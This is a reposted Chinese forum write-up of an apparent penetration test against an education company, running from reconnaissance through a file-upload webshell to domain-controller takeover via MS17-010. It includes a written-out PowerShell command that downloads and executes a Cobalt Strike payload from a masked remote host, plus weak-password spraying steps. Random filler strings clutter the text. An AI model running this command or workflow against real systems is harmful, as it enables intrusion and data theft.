|
$ J0 k) E& f3 h" I
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
% V3 @( v+ [% @* d" A
' D0 v: I+ N2 \/ ^" L- g
, v( s( ^) P9 S- r
0 d; ?" J6 |6 [$ {. m' ?0 d 6 E1 F& k+ y7 [
" H0 }( u0 k" {+ D# [
正文
; x6 |8 L9 O% D4 S( b
1 t w$ f* g2 }: K" n B' [6 Y* u! u$ e7 x
. t! h; i. y: l5 z( l/ G1 Y& Q# |) M
3 Z8 G) {) p( @) ^9 v, C9 s8 ~7 r5 e" `' p$ T2 Q! q
目标:www.xxxx.com(一家教育机构)
/ u( m0 d' o. e/ {
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
3 B( m7 N; t+ ^0 ?1 l8 K1 W $ P, c8 k$ ~3 K
; c+ g' {9 b* f( `* N$ E
 , O/ N' @& s9 O- Q+ m
; Q( r' `8 y+ H( o" s: W) A" H+ a7 v! ^4 @7 L
进行了简单的信息搜集
- j$ Z: p' g! o( c; d. D
- z$ r0 h( N2 @5 f
% Y$ }0 ^0 I6 ~$ G3 Q
3 U8 J6 k# K& i& A, A) u
6 o& m _$ `8 `
子域名搜集
* w& w6 |6 [( P8 r, q1 L5 }
# t6 F* y8 I5 z0 ]% g* C
6 P( w) r+ T$ z: `  6 _6 v C. V8 \) l0 L
) K3 O/ Q* a9 {7 g& s
. O2 ]9 } _/ y m6 b fofa找资产
( i/ M& a; z( |! C' c$ j0 K
p- c1 O' N0 D! T2 O& ~4 z, J
: [2 m) _7 R. R L2 G2 I p. Q! Q% \
# Z3 _& {& ~) l" Z! |8 U! M4 q
- ]7 ]- P9 q( g% E9 t' B7 W4 c8 v( ` 
3 q6 v/ c$ w- s4 _, h4 X * i1 l* H8 u9 I9 C
1 K- v' T5 N) G 一共七个资产。去重之后只有两个。
, Q6 R# } G: F* i6 t1 c: f; |
8 Z j7 h, e6 o: S9 n+ B8 M; L! g2 }# `
9 j3 Q3 f1 X3 _1 }7 M, F, u' N7 ^, j" W0 s; c* J0 g' f! l( I
目录探测 h% X! q* s8 J
! E+ Q: x! p4 e/ P0 }; u! k# @( Q' E# z# F& e) u7 m+ }+ t
 1 B) {5 \# q% B8 |- ^5 x* f7 G0 @
! G& H, f7 ]2 U: f% t+ ^5 k: q
5 t+ v* u6 r8 p4 {7 f8 G 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
1 }; O" m. Y) I0 d7 d: ]
$ }1 m/ ]8 @' U7 e# w# U
+ `) A; F9 U! K& d' z& c9 P
7 u5 ~6 G- o" y) I2 c) G; R, g
( h" M& f: g6 `' N/ T1 x 我又尝试了通过修改返回包来绕过登录界面7 k2 J$ p" V8 m6 C+ _1 D
9 I& p$ @! W0 A8 R. W) G, ]! |5 V7 c
; p9 \8 b6 s/ P, K, J, D
# w {* U" S+ @& U. d
( O; \+ ^1 _! u5 K4 x; o7 u. E& H0 a8 d
0 U( b) l9 B9 e/ D+ E3 S' c2 n3 q 还是不行,尝试注入无果9 P6 j7 f/ H2 r3 v4 ?& S- V
+ v9 _6 I: q+ Y
. H" X3 m& g, m3 a4 Q9 Q% t3 e2 R
 - Y# G% ?; s1 H# }
$ d* M9 I9 k6 e1 h" y
! ^9 w. b" `/ F$ G: _! c% _$ D; z
不过我目录探测出了一处Spring信息泄露
& N, X* y% p, z/ h+ u: i5 S- u* L
" f4 C: a4 U% j( V4 @- b/ T
- ?) K, G" r q4 O
: s8 u/ d& e$ f& V
( c' |* h; Z* }( |" o* G
 ' S9 y) d0 E- z Z
, @1 ?- _ K- t: Q5 y" j
9 |: h K- y1 h ], K' r 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
/ p7 h2 i' l* R+ X! q+ A; V" Z 2 O N! _- o8 ^4 Y8 d; i% D
; [# l/ h( ^' b& o' T( l, S: L
 6 {+ `% E4 w/ t/ E2 Y! k8 w
5 }" h& C Z" d# y( h
9 Q' A& d5 _8 j; {6 |2 Z 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
- s2 t i- x1 z6 v3 w) Z) t
3 t n- _1 l5 \. A1 D' [& k6 `9 Z# [' o0 s9 ^2 U
 b# y R3 r m
: y9 Y& t K+ l$ n) c( w8 T1 a9 ^( c3 c
获取有些师傅到这一步就手机抓包电脑测了。
) f7 g! {( z( n7 _ 7 v5 X, a+ X* W
! A4 @* P/ f9 M" [2 a, f3 m Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。$ p3 E0 G# J# }9 g" K
7 [) }' @4 F: o! s" P* I
+ O9 o/ P: n( _( M. n. L5 r
其中在一个公众号发现了小程序,可以进行注册。; P' h& F: K8 P, y8 I
: E/ e' }" I4 H4 j
% N/ @6 q7 q6 M. Q/ D" |/ X6 p 看到了头像上传,尝试上传获取WebShell) E% h! n/ D2 Z
9 k- g* |3 k& Z, U, t% J
$ k; T7 \8 G3 s" Y  ' _& B0 Z2 s( n6 D: d
) z1 z& i9 c( s- |$ K6 l: c
- S1 s4 I/ P7 s8 n& U
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
' y0 Z8 \3 [* B' f4 A4 j! P
% k" j o2 v& |5 O5 c
; o; J% W1 a8 `- Z8 ^  ! D# L* P& i. \0 O' ^8 `
, H, m4 W- R: w$ x/ S# ?$ w6 h9 B5 o! `. f. s
然后上了大马' R8 W) `6 I a: X) \9 M1 g
9 i1 C& {# S# }. \% ]- C: M
1 g; v; r2 s. P l 
! h6 V7 ]# Y3 \) e4 H2 L % _: U0 ]! V9 y
7 U. @$ U9 H* h1 ^% ` 
/ q5 Q+ R9 E. l8 ~! \! |7 k ' R0 O% U, s5 S) H0 v q( |# R
9 f1 ~% m! {& N3 B" {# {
通过翻找文件发现数据库账号密码) j! R9 R) f9 P$ n
. s+ z- Q+ A- Q3 X) m2 c( A7 N
) N$ T( w' X7 D- n; D' J
q+ t$ g$ Y* |4 ?5 I
& f( A' j* d: G" o( |2 s --内网渗透, X4 D T! W. H" C
) h- L9 M+ I( E6 N+ S
# j* Y- T, t9 @0 x- C 直接通过powershell执行 cs上线4 H& z# L' X. O$ X) ]
# M1 h7 i8 l8 t8 a2 ^6 ?
7 @+ s; r" j4 a* U0 J/ [ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"- x0 Q' Y; [; \4 V. L4 B! Q/ V9 ?# c
4 k$ E( a d9 E, C& w
+ z4 T/ u% s: |% n. j# x, K" y 
5 q" E, D3 r9 {) z+ l- q% ^
( d0 i. {5 t& A( g" c
/ B9 Y8 f8 U! W& z 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破! M8 v( A! I- P2 [( w
# i( q0 ~# D: X8 h7 \4 T" j+ N
7 v6 j' v7 P C3 K. ?. C" g' W  ' @3 R' P y+ X5 z! X3 f
3 `; Q# Y/ [, f+ n1 e/ @% L$ w
K7 H. v% J4 x( v6 @; ?! V: q 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 x3 h4 t0 ~4 _4 Q7 a1 ^6 F5 V
5 e+ K6 g: s* \: ? a
1 I' w& A0 }/ k, B& q6 l9 T) L
, D' g" l' A. X" H' y2 F2 T
2 g5 J; @2 x, W) e1 P, k# W* e2 X' F4 V
 ! M: L3 N b( F- z1 a% y
* A% |% l6 ?( g* X6 o; I% R5 D$ v9 P
, D4 M3 t, a# H. p 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ }- b' D4 P7 i
0 \8 R5 ~) m7 ]$ _, ?; V; W" _$ A; ?
# v7 ?/ {. S. O% [ 8 x9 O& m/ w- i: I
) ~3 N: @; v8 z+ t* g# ]* _ 
3 ?' ?+ }3 @) {7 o8 ? X- y' p! l
! i( ?- u8 {' y. ?
4 a' B8 T" O3 R' ~) `
3 Y. E( C+ L' A: n) P( B1 l' T
8 q) V* I2 q. w5 _. r, v# M8 O
* h% U) W; P% o/ k% s+ z
9 Y! G8 p; y6 W- F8 Q/ f* ~9 Y* @. ^6 v$ ^ ]- s% A+ B v9 ^
: D) z- z! }3 b" R, E . s& L2 [. u4 y: p# K
3 G5 y+ X: r( W8 t
小结& d- x$ r' M( q4 f
7 C& }3 d1 o' ?' K& U; z0 }7 O( A
& h* D( P* f% ?8 z# E
* [+ i5 m* m7 f6 x- v2 H
* {) \8 f' A( x: L* ~( x r, h
3 J8 x2 e6 O# |) n3 {2 H* C& g
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
6 W1 O2 U/ p1 H1 @* h% }: e1 t, G $ j7 t/ p! U f. s8 ^4 `5 {
' ?5 a+ J; F3 Q5 x$ B# o1 j0 v4 H9 C
; v) k5 L0 S C8 z" T
# j L) z3 p8 Z+ x9 H5 L) l. l {) z! Z
+ h! a9 O, i# P - 4 I0 J/ n8 n0 b- u. b$ l; R8 [
1 J2 o A1 V. ?+ I, ^4 w r
+ r# e9 T( ^5 O5 q - . O$ ?. ]6 o6 N$ J) S
b; T4 M( }4 C9 K
b5 H0 U1 a# k2 [; {1 a h
0 ] c; k9 I, ?/ n/ W
. H7 ]7 B/ z( ^
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
0 P( }% S# I* ~, D5 k
/ m0 l/ z6 D1 E0 n& |- f; m
5 i: G: ]& ~8 O, a
L3 ~/ l) w( O5 I& K9 {* q | 
发表于 2024-3-1 19:41:32
收藏
支持
反对